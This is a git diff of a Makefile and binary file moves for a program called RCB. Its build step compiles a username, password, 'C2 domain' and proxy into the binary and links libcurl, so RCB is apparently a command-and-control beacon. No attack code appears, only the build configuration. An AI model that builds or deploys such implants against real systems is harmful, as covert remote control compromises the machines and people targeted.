diff --git a/Makefile b/Makefile index 066b5fd..41a4df8 100755 --- a/Makefile +++ b/Makefile @@ -4,4 +4,4 @@ $(info c2 domain is $(sC2Domain)) $(info proxy is $(sProxy)) default: - g++ -DsUsername="$(sUsername)" -DsPassword="$(sPassword)" -DsC2Domain="$(sC2Domain)" -DsProxy="$(sProxy)" RCB.cpp -o RCB -lcurl + g++ -DsUsername="$(sUsername)" -DsPassword="$(sPassword)" -DsC2Domain="$(sC2Domain)" -DsProxy="$(sProxy)" RCB.cpp -o bin/RCB -lcurl diff --git a/RCB b/RCB deleted file mode 100755 index f0d4a1d..0000000 Binary files a/RCB and /dev/null differ diff --git a/MakeRCB b/bin/MakeRCB similarity index 100% rename from MakeRCB rename to bin/MakeRCB diff --git a/bin/RCB b/bin/RCB new file mode 100755 index 0000000..cf2d22d Binary files /dev/null and b/bin/RCB differ